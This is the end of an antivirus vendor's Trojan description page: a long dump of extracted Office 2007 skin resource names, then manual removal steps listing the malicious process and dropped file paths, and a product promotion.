BBON_CONTEXT_I_CATEGORY_TAB1BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_O_BTN_DEFAULT3BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_BACK6BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_CAPTION2BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_TAB0BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_PANEL_BACK_B0BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_PANEL_BACK_T1BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_R_BTN_DEFAULT3BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_BACK6BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_CAPTION2BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_TAB-BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_SEPARATOR1BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_V_BTN_DEFAULT3BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_BACK6BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_CAPTION2BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_TAB1BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_Y_BTN_DEFAULT3BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_Y_CATEGORY_BACK6BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_Y_CATEGORY_CAPTION2BLACK_IDB_OFFICE2007_RIBBON_CONTEXT_Y_CATEGORY_TAB'BLACK_IDB_OFFICE2007_RIBBON_KEYTIP_BACK(BLACK_IDB_OFFICE2007_RIBBON_PANEL_BACK_B(BLACK_IDB_OFFICE2007_RIBBON_PANEL_BACK_T&BLACK_IDB_OFFICE2007_RIBBON_PANEL_MAIN-BLACK_IDB_OFFICE2007_RIBBON_PANEL_MAIN_BORDER%BLACK_IDB_OFFICE2007_RIBBON_PANEL_QAT BLACK_IDB_OFFICE2007_RIBBON_PANEL_SEPARATOR)BLACK_IDB_OFFICE2007_RIBBON_PROGRESS_BACK-BLACK_IDB_OFFICE2007_RIBBON_PROGRESS_INFINITY BLACK_IDB_OFFICE2007_RIBBON_PROGRESS_NORMAL/BLACK_IDB_OFFICE2007_RIBBON_PROGRESS_NORMAL_EXT,BLACK_IDB_OFFICE2007_RIBBON_SLIDER_BTN_MINUS BLACK_IDB_OFFICE2007_RIBBON_SLIDER_BTN_PLUS(BLACK_IDB_OFFICE2007_RIBBON_SLIDER_THUMB#BLACK_IDB_OFFICE2007_STATUSBAR_BACK'BLACK_IDB_OFFICE2007_STATUSBAR_BACK_EXT)BLACK_IDB_OFFICE2007_STATUSBAR_PANEBORDER&BLACK_IDB_OFFICE2007_STATUSBAR_SIZEBOX!BLACK_IDB_OFFICE2007_SYS_BTN_BACK#BLACK_IDB_OFFICE2007_SYS_BTN_BACK_S"BLACK_IDB_OFFICE2007_SYS_BTN_CLOSE$BLACK_IDB_OFFICE2007_SYS_BTN_CLOSE_S%BLACK_IDB_OFFICE2007_SYS_BTN_MAXIMIZE'BLACK_IDB_OFFICE2007_SYS_BTN_MAXIMIZE_S%BLACK_IDB_OFFICE2007_SYS_BTN_MINIMIZE'BLACK_IDB_OFFICE2007_SYS_BTN_MINIMIZE_S$BLACK_IDB_OFFICE2007_SYS_BTN_RESTORE&BLACK_IDB_OFFICE2007_SYS_BTN_RESTORE_S
BLUE_IDB_OFFICE2007_MENU_BTN%BLUE_IDB_OFFICE2007_MENU_BTN_DISABLED%BLUE_IDB_OFFICE2007_MENU_BTN_SCROLL_T BLUE_IDB_OFFICE2007_MENU_BTN_VERT_SEPARATOR"BLUE_IDB_OFFICE2007_MENU_ITEM_BACK&BLUE_IDB_OFFICE2007_MENU_ITEM_MARKER_C&BLUE_IDB_OFFICE2007_MENU_ITEM_MARKER_R$BLUE_IDB_OFFICE2007_OUTLOOK_BAR_BACK$BLUE_IDB_OFFICE2007_OUTLOOK_BTN_PAGE$BLUE_IDB_OFFICE2007_POPUPMENU_BORDER'BLUE_IDB_OFFICE2007_POPUPMENU_RESIZEBAR/BLUE_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_HV0BLUE_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_HVT.BLUE_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_V(BLUE_IDB_OFFICE2007_RIBBON_BORDER_FLOATY%BLUE_IDB_OFFICE2007_RIBBON_BORDER_QAT$BLUE_IDB_OFFICE2007_RIBBON_BTN_CHECK&BLUE_IDB_OFFICE2007_RIBBON_BTN_DEFAULT BLUE_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_ICON,BLUE_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_IMAGE*BLUE_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_QAT/BLUE_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_QAT_ICON,BLUE_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_F_C,BLUE_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_F_M,BLUE_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_L_C,BLUE_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_L_M,BLUE_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_M_C,BLUE_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_M_M&BLUE_IDB_OFFICE2007_RIBBON_BTN_GROUP_F&BLUE_IDB_OFFICE2007_RIBBON_BTN_GROUP_L&BLUE_IDB_OFFICE2007_RIBBON_BTN_GROUP_M&BLUE_IDB_OFFICE2007_RIBBON_BTN_GROUP_S%BLUE_IDB_OFFICE2007_RIBBON_BTN_LAUNCH*BLUE_IDB_OFFICE2007_RIBBON_BTN_LAUNCH_ICON#BLUE_IDB_OFFICE2007_RIBBON_BTN_MAIN'BLUE_IDB_OFFICE2007_RIBBON_BTN_MENU_H_C'BLUE_IDB_OFFICE2007_RIBBON_BTN_MENU_H_M'BLUE_IDB_OFFICE2007_RIBBON_BTN_MENU_V_C'BLUE_IDB_OFFICE2007_RIBBON_BTN_MENU_V_M'BLUE_IDB_OFFICE2007_RIBBON_BTN_NORMAL_B'BLUE_IDB_OFFICE2007_RIBBON_BTN_NORMAL_S%BLUE_IDB_OFFICE2007_RIBBON_BTN_PAGE_L%BLUE_IDB_OFFICE2007_RIBBON_BTN_PAGE_R(BLUE_IDB_OFFICE2007_RIBBON_BTN_PALETTE_B(BLUE_IDB_OFFICE2007_RIBBON_BTN_PALETTE_M(BLUE_IDB_OFFICE2007_RIBBON_BTN_PALETTE_T)BLUE_IDB_OFFICE2007_RIBBON_BTN_PANEL_MAIN*BLUE_IDB_OFFICE2007_RIBBON_BTN_STATUS_PANE%BLUE_IDB_OFFICE2007_RIBBON_CAPTION_QA BLUE_IDB_OFFICE2007_RIBBON_CAPTION_QA_GLASS(BLUE_IDB_OFFICE2007_RIBBON_CATEGORY_BACK'BLUE_IDB_OFFICE2007_RIBBON_CATEGORY_TAB BLUE_IDB_OFFICE2007_RIBBON_CATEGORY_TAB_SEP0BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_B_BTN_DEFAULT2BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_BACK5BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_CAPTION1BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_TAB0BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_G_BTN_DEFAULT2BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_BACK5BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_CAPTION1BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_TAB0BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_I_BTN_DEFAULT2BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_I_CATEGORY_BACK5BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_I_CATEGORY_CAPTION1BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_I_CATEGORY_TAB0BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_O_BTN_DEFAULT2BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_BACK5BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_CAPTION1BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_TAB/BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_PANEL_BACK_B/BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_PANEL_BACK_T0BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_R_BTN_DEFAULT2BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_BACK5BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_CAPTION1BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_TAB,BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_SEPARATOR0BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_V_BTN_DEFAULT2BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_BACK5BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_CAPTION1BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_TAB0BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_Y_BTN_DEFAULT2BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_Y_CATEGORY_BACK5BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_Y_CATEGORY_CAPTION1BLUE_IDB_OFFICE2007_RIBBON_CONTEXT_Y_CATEGORY_TAB&BLUE_IDB_OFFICE2007_RIBBON_KEYTIP_BACK'BLUE_IDB_OFFICE2007_RIBBON_PANEL_BACK_B'BLUE_IDB_OFFICE2007_RIBBON_PANEL_BACK_T%BLUE_IDB_OFFICE2007_RIBBON_PANEL_MAIN,BLUE_IDB_OFFICE2007_RIBBON_PANEL_MAIN_BORDER$BLUE_IDB_OFFICE2007_RIBBON_PANEL_QAT*BLUE_IDB_OFFICE2007_RIBBON_PANEL_SEPARATOR(BLUE_IDB_OFFICE2007_RIBBON_PROGRESS_BACK,BLUE_IDB_OFFICE2007_RIBBON_PROGRESS_INFINITY*BLUE_IDB_OFFICE2007_RIBBON_PROGRESS_NORMAL.BLUE_IDB_OFFICE2007_RIBBON_PROGRESS_NORMAL_EXT BLUE_IDB_OFFICE2007_RIBBON_SLIDER_BTN_MINUS*BLUE_IDB_OFFICE2007_RIBBON_SLIDER_BTN_PLUS'BLUE_IDB_OFFICE2007_RIBBON_SLIDER_THUMB"BLUE_IDB_OFFICE2007_STATUSBAR_BACK&BLUE_IDB_OFFICE2007_STATUSBAR_BACK_EXT(BLUE_IDB_OFFICE2007_STATUSBAR_PANEBORDER%BLUE_IDB_OFFICE2007_STATUSBAR_SIZEBOX BLUE_IDB_OFFICE2007_SYS_BTN_BACK"BLUE_IDB_OFFICE2007_SYS_BTN_BACK_S!BLUE_IDB_OFFICE2007_SYS_BTN_CLOSE#BLUE_IDB_OFFICE2007_SYS_BTN_CLOSE_S$BLUE_IDB_OFFICE2007_SYS_BTN_MAXIMIZE&BLUE_IDB_OFFICE2007_SYS_BTN_MAXIMIZE_S$BLUE_IDB_OFFICE2007_SYS_BTN_MINIMIZE&BLUE_IDB_OFFICE2007_SYS_BTN_MINIMIZE_S#BLUE_IDB_OFFICE2007_SYS_BTN_RESTORE%BLUE_IDB_OFFICE2007_SYS_BTN_RESTORE_S
SILVER_IDB_OFFICE2007_MENU_BTN'SILVER_IDB_OFFICE2007_MENU_BTN_DISABLED'SILVER_IDB_OFFICE2007_MENU_BTN_SCROLL_T-SILVER_IDB_OFFICE2007_MENU_BTN_VERT_SEPARATOR$SILVER_IDB_OFFICE2007_MENU_ITEM_BACK(SILVER_IDB_OFFICE2007_MENU_ITEM_MARKER_C(SILVER_IDB_OFFICE2007_MENU_ITEM_MARKER_R&SILVER_IDB_OFFICE2007_OUTLOOK_BAR_BACK&SILVER_IDB_OFFICE2007_OUTLOOK_BTN_PAGE&SILVER_IDB_OFFICE2007_POPUPMENU_BORDER)SILVER_IDB_OFFICE2007_POPUPMENU_RESIZEBAR1SILVER_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_HV2SILVER_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_HVT0SILVER_IDB_OFFICE2007_POPUPMENU_RESIZEBAR_ICON_V*SILVER_IDB_OFFICE2007_RIBBON_BORDER_FLOATY'SILVER_IDB_OFFICE2007_RIBBON_BORDER_QAT&SILVER_IDB_OFFICE2007_RIBBON_BTN_CHECK(SILVER_IDB_OFFICE2007_RIBBON_BTN_DEFAULT-SILVER_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_ICON.SILVER_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_IMAGE,SILVER_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_QAT1SILVER_IDB_OFFICE2007_RIBBON_BTN_DEFAULT_QAT_ICON.SILVER_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_F_C.SILVER_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_F_M.SILVER_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_L_C.SILVER_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_L_M.SILVER_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_M_C.SILVER_IDB_OFFICE2007_RIBBON_BTN_GROUPMENU_M_M(SILVER_IDB_OFFICE2007_RIBBON_BTN_GROUP_F(SILVER_IDB_OFFICE2007_RIBBON_BTN_GROUP_L(SILVER_IDB_OFFICE2007_RIBBON_BTN_GROUP_M(SILVER_IDB_OFFICE2007_RIBBON_BTN_GROUP_S'SILVER_IDB_OFFICE2007_RIBBON_BTN_LAUNCH,SILVER_IDB_OFFICE2007_RIBBON_BTN_LAUNCH_ICON%SILVER_IDB_OFFICE2007_RIBBON_BTN_MAIN)SILVER_IDB_OFFICE2007_RIBBON_BTN_MENU_H_C)SILVER_IDB_OFFICE2007_RIBBON_BTN_MENU_H_M)SILVER_IDB_OFFICE2007_RIBBON_BTN_MENU_V_C)SILVER_IDB_OFFICE2007_RIBBON_BTN_MENU_V_M)SILVER_IDB_OFFICE2007_RIBBON_BTN_NORMAL_B)SILVER_IDB_OFFICE2007_RIBBON_BTN_NORMAL_S'SILVER_IDB_OFFICE2007_RIBBON_BTN_PAGE_L'SILVER_IDB_OFFICE2007_RIBBON_BTN_PAGE_R*SILVER_IDB_OFFICE2007_RIBBON_BTN_PALETTE_B*SILVER_IDB_OFFICE2007_RIBBON_BTN_PALETTE_M*SILVER_IDB_OFFICE2007_RIBBON_BTN_PALETTE_T SILVER_IDB_OFFICE2007_RIBBON_BTN_PANEL_MAIN,SILVER_IDB_OFFICE2007_RIBBON_BTN_STATUS_PANE'SILVER_IDB_OFFICE2007_RIBBON_CAPTION_QA-SILVER_IDB_OFFICE2007_RIBBON_CAPTION_QA_GLASS*SILVER_IDB_OFFICE2007_RIBBON_CATEGORY_BACK)SILVER_IDB_OFFICE2007_RIBBON_CATEGORY_TAB-SILVER_IDB_OFFICE2007_RIBBON_CATEGORY_TAB_SEP2SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_B_BTN_DEFAULT4SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_BACK7SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_CAPTION3SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_B_CATEGORY_TAB2SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_G_BTN_DEFAULT4SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_BACK7SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_CAPTION3SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_G_CATEGORY_TAB2SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_I_BTN_DEFAULT4SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_I_CATEGORY_BACK7SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_I_CATEGORY_CAPTION3SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_I_CATEGORY_TAB2SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_O_BTN_DEFAULT4SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_BACK7SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_CAPTION3SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_O_CATEGORY_TAB1SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_PANEL_BACK_B1SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_PANEL_BACK_T2SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_R_BTN_DEFAULT4SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_BACK7SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_CAPTION3SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_R_CATEGORY_TAB.SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_SEPARATOR2SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_V_BTN_DEFAULT4SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_BACK7SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_CAPTION3SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_V_CATEGORY_TAB2SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_Y_BTN_DEFAULT4SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_Y_CATEGORY_BACK7SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_Y_CATEGORY_CAPTION3SILVER_IDB_OFFICE2007_RIBBON_CONTEXT_Y_CATEGORY_TAB(SILVER_IDB_OFFICE2007_RIBBON_KEYTIP_BACK)SILVER_IDB_OFFICE2007_RIBBON_PANEL_BACK_B)SILVER_IDB_OFFICE2007_RIBBON_PANEL_BACK_T'SILVER_IDB_OFFICE2007_RIBBON_PANEL_MAIN.SILVER_IDB_OFFICE2007_RIBBON_PANEL_MAIN_BORDER&SILVER_IDB_OFFICE2007_RIBBON_PANEL_QAT,SILVER_IDB_OFFICE2007_RIBBON_PANEL_SEPARATOR*SILVER_IDB_OFFICE2007_RIBBON_PROGRESS_BACK.SILVER_IDB_OFFICE2007_RIBBON_PROGRESS_INFINITY,SILVER_IDB_OFFICE2007_RIBBON_PROGRESS_NORMAL0SILVER_IDB_OFFICE2007_RIBBON_PROGRESS_NORMAL_EXT-SILVER_IDB_OFFICE2007_RIBBON_SLIDER_BTN_MINUS,SILVER_IDB_OFFICE2007_RIBBON_SLIDER_BTN_PLUS)SILVER_IDB_OFFICE2007_RIBBON_SLIDER_THUMB$SILVER_IDB_OFFICE2007_STATUSBAR_BACK(SILVER_IDB_OFFICE2007_STATUSBAR_BACK_EXT*SILVER_IDB_OFFICE2007_STATUSBAR_PANEBORDER'SILVER_IDB_OFFICE2007_STATUSBAR_SIZEBOX"SILVER_IDB_OFFICE2007_SYS_BTN_BACK$SILVER_IDB_OFFICE2007_SYS_BTN_BACK_S#SILVER_IDB_OFFICE2007_SYS_BTN_CLOSE%SILVER_IDB_OFFICE2007_SYS_BTN_CLOSE_S&SILVER_IDB_OFFICE2007_SYS_BTN_MAXIMIZE(SILVER_IDB_OFFICE2007_SYS_BTN_MAXIMIZE_S&SILVER_IDB_OFFICE2007_SYS_BTN_MINIMIZE(SILVER_IDB_OFFICE2007_SYS_BTN_MINIMIZE_S%SILVER_IDB_OFFICE2007_SYS_BTN_RESTORE'SILVER_IDB_OFFICE2007_SYS_BTN_RESTORE_S
WINDOWS7_IDB_COMBOBOX_BTN
WINDOWS7_IDB_MENU_BTN
WINDOWS7_IDB_MENU_BTN_DISABLED
WINDOWS7_IDB_MENU_ITEM_BACK
WINDOWS7_IDB_MENU_ITEM_MARKER_C
WINDOWS7_IDB_MENU_ITEM_MARKER_R WINDOWS7_IDB_RIBBON_BORDER_PANEL
WINDOWS7_IDB_RIBBON_BORDER_QAT
WINDOWS7_IDB_RIBBON_BTN_DEFAULT$WINDOWS7_IDB_RIBBON_BTN_DEFAULT_ICON%WINDOWS7_IDB_RIBBON_BTN_DEFAULT_IMAGE#WINDOWS7_IDB_RIBBON_BTN_DEFAULT_QAT%WINDOWS7_IDB_RIBBON_BTN_GROUPMENU_F_C%WINDOWS7_IDB_RIBBON_BTN_GROUPMENU_F_M%WINDOWS7_IDB_RIBBON_BTN_GROUPMENU_L_C%WINDOWS7_IDB_RIBBON_BTN_GROUPMENU_L_M%WINDOWS7_IDB_RIBBON_BTN_GROUPMENU_M_C%WINDOWS7_IDB_RIBBON_BTN_GROUPMENU_M_M
WINDOWS7_IDB_RIBBON_BTN_GROUP_F
WINDOWS7_IDB_RIBBON_BTN_GROUP_L
WINDOWS7_IDB_RIBBON_BTN_GROUP_M
WINDOWS7_IDB_RIBBON_BTN_GROUP_S
WINDOWS7_IDB_RIBBON_BTN_LAUNCH#WINDOWS7_IDB_RIBBON_BTN_LAUNCH_ICON
WINDOWS7_IDB_RIBBON_BTN_MAIN WINDOWS7_IDB_RIBBON_BTN_MENU_H_C WINDOWS7_IDB_RIBBON_BTN_MENU_H_M WINDOWS7_IDB_RIBBON_BTN_MENU_V_C WINDOWS7_IDB_RIBBON_BTN_MENU_V_M WINDOWS7_IDB_RIBBON_BTN_NORMAL_B WINDOWS7_IDB_RIBBON_BTN_NORMAL_S
WINDOWS7_IDB_RIBBON_BTN_PAGE_L
WINDOWS7_IDB_RIBBON_BTN_PAGE_R!WINDOWS7_IDB_RIBBON_BTN_PALETTE_B!WINDOWS7_IDB_RIBBON_BTN_PALETTE_M!WINDOWS7_IDB_RIBBON_BTN_PALETTE_T#WINDOWS7_IDB_RIBBON_BTN_STATUS_PANE
WINDOWS7_IDB_RIBBON_CAPTION_QA!WINDOWS7_IDB_RIBBON_CATEGORY_BACK WINDOWS7_IDB_RIBBON_CATEGORY_TAB$WINDOWS7_IDB_RIBBON_CATEGORY_TAB_SEP WINDOWS7_IDB_RIBBON_CONTEXT_B_CATEGORY_BACK.WINDOWS7_IDB_RIBBON_CONTEXT_B_CATEGORY_CAPTION*WINDOWS7_IDB_RIBBON_CONTEXT_B_CATEGORY_TAB WINDOWS7_IDB_RIBBON_CONTEXT_G_CATEGORY_BACK.WINDOWS7_IDB_RIBBON_CONTEXT_G_CATEGORY_CAPTION*WINDOWS7_IDB_RIBBON_CONTEXT_G_CATEGORY_TAB WINDOWS7_IDB_RIBBON_CONTEXT_I_CATEGORY_BACK.WINDOWS7_IDB_RIBBON_CONTEXT_I_CATEGORY_CAPTION*WINDOWS7_IDB_RIBBON_CONTEXT_I_CATEGORY_TAB WINDOWS7_IDB_RIBBON_CONTEXT_O_CATEGORY_BACK.WINDOWS7_IDB_RIBBON_CONTEXT_O_CATEGORY_CAPTION*WINDOWS7_IDB_RIBBON_CONTEXT_O_CATEGORY_TAB WINDOWS7_IDB_RIBBON_CONTEXT_R_CATEGORY_BACK.WINDOWS7_IDB_RIBBON_CONTEXT_R_CATEGORY_CAPTION*WINDOWS7_IDB_RIBBON_CONTEXT_R_CATEGORY_TAB%WINDOWS7_IDB_RIBBON_CONTEXT_SEPARATOR WINDOWS7_IDB_RIBBON_CONTEXT_V_CATEGORY_BACK.WINDOWS7_IDB_RIBBON_CONTEXT_V_CATEGORY_CAPTION*WINDOWS7_IDB_RIBBON_CONTEXT_V_CATEGORY_TAB WINDOWS7_IDB_RIBBON_CONTEXT_Y_CATEGORY_BACK.WINDOWS7_IDB_RIBBON_CONTEXT_Y_CATEGORY_CAPTION*WINDOWS7_IDB_RIBBON_CONTEXT_Y_CATEGORY_TAB
WINDOWS7_IDB_RIBBON_PANEL_BACK"WINDOWS7_IDB_RIBBON_PANEL_BACK_SEP
WINDOWS7_IDB_RIBBON_PANEL_MAIN$WINDOWS7_IDB_RIBBON_SLIDER_BTN_MINUS#WINDOWS7_IDB_RIBBON_SLIDER_BTN_PLUS
WINDOWS7_IDX_STYLE


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    txservices.exe:760

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\txservices.exe (1638 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\26727603220161118442467[1].htm (92423 bytes)
    C:\exdui.dll (53 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\PRU52LTK.txt (90 bytes)
    %Program Files%\23.txt (111347 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IBPSKBRA\NamuADLook[1].dll (17850 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X66G0HIG\33[1].txt (40 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TIR4YGN2\01[1].txt (102386 bytes)
    %Program Files%\sesvcs_963_56089.exe (1815 bytes)
    %Program Files%\NamuADLook.dll (21746 bytes)
    C:\help.dll (202 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\G1K1JV5K.txt (112 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2025 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now